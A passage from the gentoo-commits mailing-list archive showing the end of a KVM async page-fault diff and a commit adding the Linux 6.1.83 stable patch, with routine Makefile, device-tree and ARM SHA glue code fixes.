++		kvm_flush_and_free_async_pf_work(work);
++		spin_lock(&vcpu->async_pf.lock);
+ 	}
+ 	spin_unlock(&vcpu->async_pf.lock);
+ 
+@@ -152,7 +174,7 @@ void kvm_check_async_pf_completion(struct kvm_vcpu *vcpu)
+ 
+ 		list_del(&work->queue);
+ 		vcpu->async_pf.queued--;
+-		kmem_cache_free(async_pf_cache, work);
++		kvm_flush_and_free_async_pf_work(work);
+ 	}
+ }
+ 
+@@ -187,7 +209,6 @@ bool kvm_setup_async_pf(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa,
+ 	work->arch = *arch;
+ 	work->mm = current->mm;
+ 	mmget(work->mm);
+-	kvm_get_kvm(work->vcpu->kvm);
+ 
+ 	INIT_WORK(&work->work, async_pf_execute);
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-03-27 11:24 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-03-27 11:24 UTC (permalink / raw
  To: gentoo-commits

commit:     5b580758496b6fa2887fcd1af66242e779b0ccab
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 27 11:24:41 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Mar 27 11:24:41 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5b580758

Linux patch 6.1.83

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1082_linux-6.1.83.patch | 19133 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 19137 insertions(+)

diff --git a/0000_README b/0000_README
index db3a7674..3e406bb1 100644
--- a/0000_README
+++ b/0000_README
@@ -371,6 +371,10 @@ Patch:  1081_linux-6.1.82.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.82
 
+Patch:  1082_linux-6.1.83.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.83
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1082_linux-6.1.83.patch b/1082_linux-6.1.83.patch
new file mode 100644
index 00000000..328cd4b8
--- /dev/null
+++ b/1082_linux-6.1.83.patch
@@ -0,0 +1,19133 @@
+diff --git a/Makefile b/Makefile
+index c5345f3ebed0d..38657b3dda2cd 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 82
++SUBLEVEL = 83
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/arm-realview-pb1176.dts b/arch/arm/boot/dts/arm-realview-pb1176.dts
+index efed325af88d2..d99bac02232b3 100644
+--- a/arch/arm/boot/dts/arm-realview-pb1176.dts
++++ b/arch/arm/boot/dts/arm-realview-pb1176.dts
+@@ -451,7 +451,7 @@ pb1176_serial3: serial@1010f000 {
+ 
+ 		/* Direct-mapped development chip ROM */
+ 		pb1176_rom@10200000 {
+-			compatible = "direct-mapped";
++			compatible = "mtd-rom";
+ 			reg = <0x10200000 0x4000>;
+ 			bank-width = <1>;
+ 		};
+diff --git a/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi b/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
+index aacbf317feea6..4b7aee8958923 100644
+--- a/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
++++ b/arch/arm/boot/dts/imx6dl-yapp4-common.dtsi
+@@ -106,8 +106,6 @@ &fec {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_enet>;
+ 	phy-mode = "rgmii-id";
+-	phy-reset-gpios = <&gpio1 25 GPIO_ACTIVE_LOW>;
+-	phy-reset-duration = <20>;
+ 	phy-supply = <&sw2_reg>;
+ 	status = "okay";
+ 
+@@ -120,17 +118,10 @@ mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
+-		phy_port2: phy@1 {
+-			reg = <1>;
+-		};
+-
+-		phy_port3: phy@2 {
+-			reg = <2>;
+-		};
+-
+ 		switch@10 {
+ 			compatible = "qca,qca8334";
+-			reg = <10>;
++			reg = <0x10>;
++			reset-gpios = <&gpio1 25 GPIO_ACTIVE_LOW>;
+ 
+ 			switch_ports: ports {
+ 				#address-cells = <1>;
+@@ -151,15 +142,30 @@ fixed-link {
+ 				eth2: port@2 {
+ 					reg = <2>;
+ 					label = "eth2";
++					phy-mode = "internal";
+ 					phy-handle = <&phy_port2>;
+ 				};
+ 
+ 				eth1: port@3 {
+ 					reg = <3>;
+ 					label = "eth1";
++					phy-mode = "internal";
+ 					phy-handle = <&phy_port3>;
+ 				};
+ 			};
++
++			mdio {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
++				phy_port2: ethernet-phy@1 {
++					reg = <1>;
++				};
++
++				phy_port3: ethernet-phy@2 {
++					reg = <2>;
++				};
++			};
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/qcom-msm8974.dtsi b/arch/arm/boot/dts/qcom-msm8974.dtsi
+index c4b2e9ac24940..5ea45e486ed54 100644
+--- a/arch/arm/boot/dts/qcom-msm8974.dtsi
++++ b/arch/arm/boot/dts/qcom-msm8974.dtsi
+@@ -1134,7 +1134,7 @@ restart@fc4ab000 {
+ 
+ 		qfprom: qfprom@fc4bc000 {
+ 			compatible = "qcom,msm8974-qfprom", "qcom,qfprom";
+-			reg = <0xfc4bc000 0x1000>;
++			reg = <0xfc4bc000 0x2100>;
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			tsens_calib: calib@d0 {
+diff --git a/arch/arm/boot/dts/r8a73a4-ape6evm.dts b/arch/arm/boot/dts/r8a73a4-ape6evm.dts
+index e81a7213d3047..4282bafbb5043 100644
+--- a/arch/arm/boot/dts/r8a73a4-ape6evm.dts
++++ b/arch/arm/boot/dts/r8a73a4-ape6evm.dts
+@@ -209,6 +209,18 @@ &cmt1 {
+ 	status = "okay";
+ };
+ 
++&extal1_clk {
++	clock-frequency = <26000000>;
++};
++
++&extal2_clk {
++	clock-frequency = <48000000>;
++};
++
++&extalr_clk {
++	clock-frequency = <32768>;
++};
++
+ &pfc {
+ 	scifa0_pins: scifa0 {
+ 		groups = "scifa0_data";
+diff --git a/arch/arm/boot/dts/r8a73a4.dtsi b/arch/arm/boot/dts/r8a73a4.dtsi
+index c39066967053f..d1f4cbd099efb 100644
+--- a/arch/arm/boot/dts/r8a73a4.dtsi
++++ b/arch/arm/boot/dts/r8a73a4.dtsi
+@@ -450,17 +450,20 @@ clocks {
+ 		extalr_clk: extalr {
+ 			compatible = "fixed-clock";
+ 			#clock-cells = <0>;
+-			clock-frequency = <32768>;
++			/* This value must be overridden by the board. */
++			clock-frequency = <0>;
+ 		};
+ 		extal1_clk: extal1 {
+ 			compatible = "fixed-clock";
+ 			#clock-cells = <0>;
+-			clock-frequency = <25000000>;
++			/* This value must be overridden by the board. */
++			clock-frequency = <0>;
+ 		};
+ 		extal2_clk: extal2 {
+ 			compatible = "fixed-clock";
+ 			#clock-cells = <0>;
+-			clock-frequency = <48000000>;
++			/* This value must be overridden by the board. */
++			clock-frequency = <0>;
+ 		};
+ 		fsiack_clk: fsiack {
+ 			compatible = "fixed-clock";
+diff --git a/arch/arm/crypto/sha256_glue.c b/arch/arm/crypto/sha256_glue.c
+index 433ee4ddce6c8..f85933fdec75f 100644
+--- a/arch/arm/crypto/sha256_glue.c
++++ b/arch/arm/crypto/sha256_glue.c
+@@ -24,8 +24,8 @@
+ 
+ #include "sha256_glue.h"
+ 
+-asmlinkage void sha256_block_data_order(u32 *digest, const void *data,
+-					unsigned int num_blks);
++asmlinkage void sha256_block_data_order(struct sha256_state *state,
++					const u8 *data, int num_blks);
+ 
+ int crypto_sha256_arm_update(struct shash_desc *desc, const u8 *data,
+ 			     unsigned int len)
+@@ -33,23 +33,20 @@ int crypto_sha256_arm_update(struct shash_desc *desc, const u8 *data,
+ 	/* make sure casting to sha256_block_fn() is safe */
+ 	BUILD_BUG_ON(offsetof(struct sha256_state, state) != 0);
+ 
+-	return sha256_base_do_update(desc, data, len,
+-				(sha256_block_fn *)sha256_block_data_order);
++	return sha256_base_do_update(desc, data, len, sha256_block_data_order);
+ }
+ EXPORT_SYMBOL(crypto_sha256_arm_update);
+ 
+ static int crypto_sha256_arm_final(struct shash_desc *desc, u8 *out)
+ {
+-	sha256_base_do_finalize(desc,
+-				(sha256_block_fn *)sha256_block_data_order);
++	sha256_base_do_finalize(desc, sha256_block_data_order);
+ 	return sha256_base_finish(desc, out);
+ }
+ 
+ int crypto_sha256_arm_finup(struct shash_desc *desc, const u8 *data,
+ 			    unsigned int len, u8 *out)
+ {
+-	sha256_base_do_update(desc, data, len,
+-			      (sha256_block_fn *)sha256_block_data_order);
++	sha256_base_do_update(desc, data, len, sha256_block_data_order);
+ 	return crypto_sha256_arm_final(desc, out);
+ }
+ EXPORT_SYMBOL(crypto_sha256_arm_finup);
+diff --git a/arch/arm/crypto/sha512-glue.c b/arch/arm/crypto/sha512-glue.c
+index 0635a65aa488b..1be5bd498af36 100644
+--- a/arch/arm/crypto/sha512-glue.c
++++ b/arch/arm/crypto/sha512-glue.c
+@@ -25,27 +25,25 @@ MODULE_ALIAS_CRYPTO("sha512");
+ MODULE_ALIAS_CRYPTO("sha384-arm");
+ MODULE_ALIAS_CRYPTO("sha512-arm");
+ 
+-asmlinkage void sha512_block_data_order(u64 *state, u8 const *src, int blocks);
++asmlinkage void sha512_block_data_order(struct sha512_state *state,
++					u8 const *src, int blocks);
+ 
+ int sha512_arm_update(struct shash_desc *desc, const u8 *data,
+ 		      unsigned int len)
+ {
+-	return sha512_base_do_update(desc, data, len,
+-		(sha512_block_fn *)sha512_block_data_order);
++	return sha512_base_do_update(desc, data, len, sha512_block_data_order);
+ }
+ 
+ static int sha512_arm_final(struct shash_desc *desc, u8 *out)
+ {
+-	sha512_base_do_finalize(desc,
+-		(sha512_block_fn *)sha512_block_data_order);
++	sha512_base_do_finalize(desc, sha512_block_data_order);
+ 	return sha512_base_finish(desc, out);
+ }
+ 
+ int sha512_arm_finup(struct shash_desc *desc, const u8 *data,
+ 		     unsigned int len, u8 *out)
+ {
+-	sha512_base_do_update(desc, data, len,
+-		(sha512_block_fn *)sha512_block_data_order);
++	sha512_base_do_update(desc, data, len, sha512_block_data_order);
+ 	return sha512_arm_final(desc, out);
+ }
+ 
+diff --git a/arch/arm64/boot/dts/allwinner/sun50i-h6-beelink-gs1.dts b/arch/arm64/boot/dts/allwinner/sun50i-h6-beelink-gs1.dts
+index 9ec49ac2f6fd5..381d58cea092d 100644
+--- a/arch/arm64/boot/dts/allwinner/sun50i-h6-beelink-gs1.dts
++++ b/arch/arm64/boot/dts/allwinner/sun50i-h6-beelink-gs1.dts
+@@ -291,6 +291,8 @@ sw {
+ };
+ 
+ &spdif {
++	pinctrl-names = "default";
++	pinctrl-0 = <&spdif_tx_pin>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/allwinner/sun50i-h6-tanix.dtsi b/arch/arm64/boot/dts/allwinner/sun50i-h6-tanix.dtsi
+index 4903d6358112d..855b7d43bc503 100644
+--- a/arch/arm64/boot/dts/allwinner/sun50i-h6-tanix.dtsi
++++ b/arch/arm64/boot/dts/allwinner/sun50i-h6-tanix.dtsi
+@@ -166,6 +166,8 @@ &r_ir {
+ };
+ 
+ &spdif {
++	pinctrl-names = "default";
++	pinctrl-0 = <&spdif_tx_pin>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/allwinner/sun50i-h6.dtsi b/arch/arm64/boot/dts/allwinner/sun50i-h6.dtsi
+index ca1d287a0a01d..d11e5041bae9a 100644
+--- a/arch/arm64/boot/dts/allwinner/sun50i-h6.dtsi
++++ b/arch/arm64/boot/dts/allwinner/sun50i-h6.dtsi
+@@ -406,6 +406,7 @@ spi1_cs_pin: spi1-cs-pin {
+ 				function = "spi1";
+ 			};
+ 
++			/omit-if-no-ref/
+ 			spdif_tx_pin: spdif-tx-pin {
+ 				pins = "PH7";
+ 				function = "spdif";
+@@ -655,10 +656,8 @@ spdif: spdif@5093000 {
+ 			clocks = <&ccu CLK_BUS_SPDIF>, <&ccu CLK_SPDIF>;
+ 			clock-names = "apb", "spdif";
+ 			resets = <&ccu RST_BUS_SPDIF>;
+-			dmas = <&dma 2>;
+-			dma-names = "tx";
+-			pinctrl-names = "default";
+-			pinctrl-0 = <&spdif_tx_pin>;
++			dmas = <&dma 2>, <&dma 2>;
++			dma-names = "rx", "tx";
+ 			status = "disabled";
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/amazon/alpine-v2.dtsi b/arch/arm64/boot/dts/amazon/alpine-v2.dtsi
+index 4eb2cd14e00b0..9b6da84deae7a 100644
+--- a/arch/arm64/boot/dts/amazon/alpine-v2.dtsi
++++ b/arch/arm64/boot/dts/amazon/alpine-v2.dtsi
+@@ -145,7 +145,6 @@ pci@fbc00000 {
+ 		msix: msix@fbe00000 {
+ 			compatible = "al,alpine-msix";
+ 			reg = <0x0 0xfbe00000 0x0 0x100000>;
+-			interrupt-controller;
+ 			msi-controller;
+ 			al,msi-base-spi = <160>;
+ 			al,msi-num-spis = <160>;
+diff --git a/arch/arm64/boot/dts/amazon/alpine-v3.dtsi b/arch/arm64/boot/dts/amazon/alpine-v3.dtsi
+index 73a352ea8fd5c..b30014d4dc29c 100644
+--- a/arch/arm64/boot/dts/amazon/alpine-v3.dtsi
++++ b/arch/arm64/boot/dts/amazon/alpine-v3.dtsi
+@@ -351,7 +351,6 @@ pcie@fbd00000 {
+ 		msix: msix@fbe00000 {
+ 			compatible = "al,alpine-msix";
+ 			reg = <0x0 0xfbe00000 0x0 0x100000>;
+-			interrupt-controller;
+ 			msi-controller;
+ 			al,msi-base-spi = <336>;
+ 			al,msi-num-spis = <959>;
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+index df71348542064..a4c5a38905b03 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+@@ -180,9 +180,6 @@ ethernet-switch@0 {
+ 				brcm,num-gphy = <5>;
+ 				brcm,num-rgmii-ports = <2>;
+ 
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+-
+ 				ports: ports {
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/broadcom/northstar2/ns2.dtsi b/arch/arm64/boot/dts/broadcom/northstar2/ns2.dtsi
+index fda97c47f4e97..d5778417455c0 100644
+--- a/arch/arm64/boot/dts/broadcom/northstar2/ns2.dtsi
++++ b/arch/arm64/boot/dts/broadcom/northstar2/ns2.dtsi
+@@ -584,6 +584,7 @@ gpio_g: gpio@660a0000 {
+ 			#gpio-cells = <2>;
+ 			gpio-controller;
+ 			interrupt-controller;
++			#interrupt-cells = <2>;
+ 			interrupts = <GIC_SPI 400 IRQ_TYPE_LEVEL_HIGH>;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/broadcom/stingray/stingray.dtsi b/arch/arm64/boot/dts/broadcom/stingray/stingray.dtsi
+index 8f8c25e51194d..473d7d0ddf369 100644
+--- a/arch/arm64/boot/dts/broadcom/stingray/stingray.dtsi
++++ b/arch/arm64/boot/dts/broadcom/stingray/stingray.dtsi
+@@ -442,6 +442,7 @@ gpio_hsls: gpio@d0000 {
+ 			#gpio-cells = <2>;
+ 			gpio-controller;
+ 			interrupt-controller;
++			#interrupt-cells = <2>;
+ 			interrupts = <GIC_SPI 183 IRQ_TYPE_LEVEL_HIGH>;
+ 			gpio-ranges = <&pinmux 0 0 16>,
+ 					<&pinmux 16 71 2>,
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl-osm-s.dts b/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl-osm-s.dts
+index 8b16bd68576c0..d9fa0deea7002 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl-osm-s.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl-osm-s.dts
+@@ -294,8 +294,8 @@ MX8MM_IOMUXC_SAI3_MCLK_GPIO5_IO2		0x19
+ 
+ 	pinctrl_i2c4: i2c4grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_I2C4_SCL_I2C4_SCL			0x400001c3
+-			MX8MM_IOMUXC_I2C4_SDA_I2C4_SDA			0x400001c3
++			MX8MM_IOMUXC_I2C4_SCL_I2C4_SCL			0x40000083
++			MX8MM_IOMUXC_I2C4_SDA_I2C4_SDA			0x40000083
+ 		>;
+ 	};
+ 
+@@ -313,19 +313,19 @@ MX8MM_IOMUXC_SAI5_MCLK_GPIO3_IO25		0x19
+ 
+ 	pinctrl_uart1: uart1grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SAI2_RXC_UART1_DCE_RX		0x140
+-			MX8MM_IOMUXC_SAI2_RXFS_UART1_DCE_TX		0x140
+-			MX8MM_IOMUXC_SAI2_RXD0_UART1_DCE_RTS_B		0x140
+-			MX8MM_IOMUXC_SAI2_TXFS_UART1_DCE_CTS_B		0x140
++			MX8MM_IOMUXC_SAI2_RXC_UART1_DCE_RX		0x0
++			MX8MM_IOMUXC_SAI2_RXFS_UART1_DCE_TX		0x0
++			MX8MM_IOMUXC_SAI2_RXD0_UART1_DCE_RTS_B		0x0
++			MX8MM_IOMUXC_SAI2_TXFS_UART1_DCE_CTS_B		0x0
+ 		>;
+ 	};
+ 
+ 	pinctrl_uart2: uart2grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SAI3_TXFS_UART2_DCE_RX		0x140
+-			MX8MM_IOMUXC_SAI3_TXC_UART2_DCE_TX		0x140
+-			MX8MM_IOMUXC_SAI3_RXD_UART2_DCE_RTS_B		0x140
+-			MX8MM_IOMUXC_SAI3_RXC_UART2_DCE_CTS_B		0x140
++			MX8MM_IOMUXC_SAI3_TXFS_UART2_DCE_RX		0x0
++			MX8MM_IOMUXC_SAI3_TXC_UART2_DCE_TX		0x0
++			MX8MM_IOMUXC_SAI3_RXD_UART2_DCE_RTS_B		0x0
++			MX8MM_IOMUXC_SAI3_RXC_UART2_DCE_CTS_B		0x0
+ 		>;
+ 	};
+ 
+@@ -337,40 +337,40 @@ MX8MM_IOMUXC_NAND_CE1_B_GPIO3_IO2		0x19
+ 
+ 	pinctrl_usdhc2: usdhc2grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x190
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x90
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d0
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ 
+ 	pinctrl_usdhc2_100mhz: usdhc2-100mhzgrp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x194
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x94
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d4
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ 
+ 	pinctrl_usdhc2_200mhz: usdhc2-200mhzgrp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x196
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x96
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d6
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl.dts b/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl.dts
+index a079322a37931..d54cddd65b526 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-kontron-bl.dts
+@@ -277,8 +277,8 @@ MX8MM_IOMUXC_SAI3_MCLK_GPIO5_IO2		0x19
+ 
+ 	pinctrl_i2c4: i2c4grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_I2C4_SCL_I2C4_SCL			0x400001c3
+-			MX8MM_IOMUXC_I2C4_SDA_I2C4_SDA			0x400001c3
++			MX8MM_IOMUXC_I2C4_SCL_I2C4_SCL			0x40000083
++			MX8MM_IOMUXC_I2C4_SDA_I2C4_SDA			0x40000083
+ 		>;
+ 	};
+ 
+@@ -290,19 +290,19 @@ MX8MM_IOMUXC_SPDIF_RX_PWM2_OUT			0x19
+ 
+ 	pinctrl_uart1: uart1grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SAI2_RXC_UART1_DCE_RX		0x140
+-			MX8MM_IOMUXC_SAI2_RXFS_UART1_DCE_TX		0x140
+-			MX8MM_IOMUXC_SAI2_RXD0_UART1_DCE_RTS_B		0x140
+-			MX8MM_IOMUXC_SAI2_TXFS_UART1_DCE_CTS_B		0x140
++			MX8MM_IOMUXC_SAI2_RXC_UART1_DCE_RX		0x0
++			MX8MM_IOMUXC_SAI2_RXFS_UART1_DCE_TX		0x0
++			MX8MM_IOMUXC_SAI2_RXD0_UART1_DCE_RTS_B		0x0
++			MX8MM_IOMUXC_SAI2_TXFS_UART1_DCE_CTS_B		0x0
+ 		>;
+ 	};
+ 
+ 	pinctrl_uart2: uart2grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SAI3_TXFS_UART2_DCE_RX		0x140
+-			MX8MM_IOMUXC_SAI3_TXC_UART2_DCE_TX		0x140
+-			MX8MM_IOMUXC_SAI3_RXD_UART2_DCE_RTS_B		0x140
+-			MX8MM_IOMUXC_SAI3_RXC_UART2_DCE_CTS_B		0x140
++			MX8MM_IOMUXC_SAI3_TXFS_UART2_DCE_RX		0x0
++			MX8MM_IOMUXC_SAI3_TXC_UART2_DCE_TX		0x0
++			MX8MM_IOMUXC_SAI3_RXD_UART2_DCE_RTS_B		0x0
++			MX8MM_IOMUXC_SAI3_RXC_UART2_DCE_CTS_B		0x0
+ 		>;
+ 	};
+ 
+@@ -314,40 +314,40 @@ MX8MM_IOMUXC_NAND_CE1_B_GPIO3_IO2		0x19
+ 
+ 	pinctrl_usdhc2: usdhc2grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x190
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x90
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d0
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d0
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ 
+ 	pinctrl_usdhc2_100mhz: usdhc2-100mhzgrp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x194
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x94
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d4
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d4
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ 
+ 	pinctrl_usdhc2_200mhz: usdhc2-200mhzgrp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x196
++			MX8MM_IOMUXC_SD2_CLK_USDHC2_CLK			0x96
+ 			MX8MM_IOMUXC_SD2_CMD_USDHC2_CMD			0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA0_USDHC2_DATA0		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA1_USDHC2_DATA1		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA2_USDHC2_DATA2		0x1d6
+ 			MX8MM_IOMUXC_SD2_DATA3_USDHC2_DATA3		0x1d6
+-			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x019
+-			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0x1d0
++			MX8MM_IOMUXC_SD2_CD_B_GPIO2_IO12		0x19
++			MX8MM_IOMUXC_GPIO1_IO04_USDHC2_VSELECT		0xd0
+ 		>;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-kontron-osm-s.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-kontron-osm-s.dtsi
+index 8d10f5b412978..d5199ecb3f6c1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-kontron-osm-s.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-kontron-osm-s.dtsi
+@@ -205,7 +205,7 @@ rtc@52 {
+ 		reg = <0x52>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_rtc>;
+-		interrupts-extended = <&gpio4 1 IRQ_TYPE_LEVEL_HIGH>;
++		interrupts-extended = <&gpio4 1 IRQ_TYPE_LEVEL_LOW>;
+ 		trickle-diode-disable;
+ 	};
+ };
+@@ -247,8 +247,8 @@ MX8MM_IOMUXC_ECSPI1_SS0_GPIO5_IO9		0x19
+ 
+ 	pinctrl_i2c1: i2c1grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x400001c3
+-			MX8MM_IOMUXC_I2C1_SDA_I2C1_SDA			0x400001c3
++			MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x40000083
++			MX8MM_IOMUXC_I2C1_SDA_I2C1_SDA			0x40000083
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-kontron-sl.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-kontron-sl.dtsi
+index 0679728d24899..884ae2ad35114 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-kontron-sl.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-kontron-sl.dtsi
+@@ -237,8 +237,8 @@ MX8MM_IOMUXC_ECSPI1_SS0_GPIO5_IO9		0x19
+ 
+ 	pinctrl_i2c1: i2c1grp {
+ 		fsl,pins = <
+-			MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x400001c3
+-			MX8MM_IOMUXC_I2C1_SDA_I2C1_SDA			0x400001c3
++			MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x40000083
++			MX8MM_IOMUXC_I2C1_SDA_I2C1_SDA			0x40000083
+ 		>;
+ 	};
+ 
